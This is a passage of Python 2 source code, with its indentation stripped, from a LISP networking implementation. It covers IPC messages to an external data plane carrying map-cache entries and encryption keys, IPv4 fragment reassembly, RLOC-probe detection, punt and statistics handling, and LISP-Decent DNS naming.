# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsualted packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happensu
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If are an RTR, we can process the stats directly. If are an ITR we need
# to send an IPC message the the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(seid, deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x.q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
